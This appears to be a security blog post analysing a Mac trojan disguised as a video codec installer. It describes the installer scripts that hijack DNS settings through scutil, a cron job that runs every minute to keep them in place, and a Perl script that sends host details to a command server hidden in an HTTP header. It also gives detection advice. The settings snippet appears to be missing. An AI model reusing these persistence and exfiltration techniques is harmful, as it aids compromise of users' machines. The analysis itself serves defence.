So, let’s see what really happens here. The “social engineering” part has been seen million times – an unsuspecting user visits a web site with a movie on it, however, he needs to download a new codec in order to view it. On Windows, that new codec is typically a PE executable, for Mac the bad guys prepared a DMG archive (DMG files are like ISOs). The user is then prompted to install the package and during this process he will have to supply the administrator credentials. Yep, it’s game over from this point in time (and the attack is exactly the same as on Windows – keep in mind that these users *will* willingly supply these credentials.

Mac installer

Now that we know what happens, let’s see how this whole thing works. I analyzed this on a Linux machine so I first had to convert the DMG file into something Linux can read (an ISO). There is a simple dmg2img utility available from http://vu1tur.eu.org/tools/ that does the job perfectly.

Once you converted the file to an ISO image, you can mount it and see what’s going on. The most important directory is Resources which contains scripts that are executed before and after the installation. The files that get installed are kept in the Archive.pax.gz file – it’s a gzip compressed cpio file.

The preinstall/preupgrade files from the Resources directory get executed immediately after the installation starts (and they do the main job). These two files are just shell scripts which change the DNS server settings on the machine by using the scutil utility. Here’s what they set the DNS servers to:



path="/Library/Internet Plug-Ins"

(Yes, the IP addresses are familiar). The scripts also create a new cronjob that gets executed every minute. The cron job executes a file called plugins.settings, which is just a copy of the preinstall/preupgrade files – it makes sure that the DNS servers stay as those above and that the cronjob is not removed.

Finally, the postinstall/postupgrade scripts execute a Perl script called sendreq. This Perl script collects some information about the local machine (uname –p and hostname), Base64 encodes them and sends the information to the C&C server ( An interesting thing is that this gets submitted as the Accept-Language: header so it should be easy to write a Snort signature to catch this.

As I said, although the Trojan is really simple, it could have done much worst things (once the installer script has root privileges, it is game over anyway). This malware shows that we must not ignore Mac machines and that Mac users should not think they are invulnerable just by using a Mac and that they can click on absolutely everything.

From the network point of view – pay attention to DNS traffic as any requests that leave your network, and are not from your DNS servers are either coming from infected or misconfigured machines.